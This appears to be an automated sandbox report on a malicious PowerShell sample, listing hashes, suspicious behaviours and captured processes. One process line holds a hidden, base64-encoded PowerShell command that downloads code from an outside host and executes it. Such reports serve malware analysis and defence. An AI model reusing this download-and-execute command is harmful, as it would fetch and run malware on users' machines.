Overview
overview
10Static
static
104bd/472-84...mp.dll
windows7_x64
34bd/472-84...mp.dll
windows10_x64
34bd/Attach...ng.lnk
windows7_x64
84bd/Attach...ng.lnk
windows10_x64
8Attachment.png.lnk
windows7_x64
8Attachment.png.lnk
windows10_x64
8work.ps1
windows7_x64
8work.ps1
windows10_x64
84bd/ldr.dat.ps1
windows7_x64
104bd/ldr.dat.ps1
windows10_x64
14bd/work.ps1
windows7_x64
84bd/work.ps1
windows10_x64
8Analysis
-
max time kernel
22s -
max time network
24s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
25-08-2021 20:27
Static task
static1
Behavioral task
behavioral1
Sample
4bd/472-84-0x000000001A910000-0x000000001A919000-memory.dmp.dll
Resource
win7v20210408
Behavioral task
behavioral2
Sample
4bd/472-84-0x000000001A910000-0x000000001A919000-memory.dmp.dll
Resource
win10v20210410
Behavioral task
behavioral3
Sample
4bd/Attachment.png.lnk
Resource
win7v20210408
Behavioral task
behavioral4
Sample
4bd/Attachment.png.lnk
Resource
win10v20210410
Behavioral task
behavioral5
Sample
Attachment.png.lnk
Resource
win7v20210408
Behavioral task
behavioral6
Sample
Attachment.png.lnk
Resource
win10v20210410
Behavioral task
behavioral7
Sample
work.ps1
Resource
win7v20210410
Behavioral task
behavioral8
Sample
work.ps1
Resource
win10v20210408
Behavioral task
behavioral9
Sample
4bd/ldr.dat.ps1
Resource
win7v20210410
Behavioral task
behavioral10
Sample
4bd/ldr.dat.ps1
Resource
win10v20210408
Behavioral task
behavioral11
Sample
4bd/work.ps1
Resource
win7v20210410
Behavioral task
behavioral12
Sample
4bd/work.ps1
Resource
win10v20210408
General
-
Target
4bd/work.ps1
-
Size
1.4MB
-
MD5
7ba4b5c5d3e3276a3cfe8d581cf7173b
-
SHA1
79ba87b46562e75f097c1b6d23d3b63b9160bbaa
-
SHA256
73737bf28fa00ea1380bf98a76f6c2ff34bf25e8b489750acccc45df8e898022
-
SHA512
ccccc4402edc1c333f2b11955b4c2850f5b68674e473d57521cb009e2047a46f9c57c0151b9191d4a2e3b10931723d0191bba9b299ffb3bb293ff7d6f83598c6
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 408 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 452 powershell.exe 408 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 452 powershell.exe Token: SeDebugPrivilege 408 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
powershell.exedescription pid process target process PID 452 wrote to memory of 408 452 powershell.exe powershell.exe PID 452 wrote to memory of 408 452 powershell.exe powershell.exe PID 452 wrote to memory of 408 452 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\4bd\work.ps11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc JABNAD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGgAaQBuAGcAYwBhAGwAbABlAGQAYwBhAGsAZQAuAGMAbwBtAC8AZgBpAGwAZQAnACkAOwAkAHQAPQAkAE0ALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABSAD0AJAB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAUgA7ACQAcAA9ACQARgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AGkAZQB4ACgAJABwACkAOwAgAA==2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD542623088a3aba1ed4b4c742897e5c77d
SHA1e06b17ea0879bb680315af8140996409d4ed9451
SHA2560d52bb0f43afc39b26dce6c7dcd4beae673b730bac06d992f2921d9fa38c47ac
SHA5124c710d5362932392146e96cc843e8c0be606384fa9d79d23f977912f9ced014da4f85d0abb62a7576c489659fdaed609e8032972a647b558280d4f94c3c7df49
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5296b396d34e86a9339650fbdcb6be3b6
SHA1d73af6e09e315eebdd7ac97637437ebeba0b7405
SHA2567c4e1c34f5178da09241eb926169763e3c77a52a35f9142788cff2e809cbd758
SHA5123c73a58416a66273d0651016cbde256d6648afd3d0802c108e6c31b00c7edd24215684118dce76e9cdd6f0367db24916c23e54ebf0d5814027a3aec5ef726fd5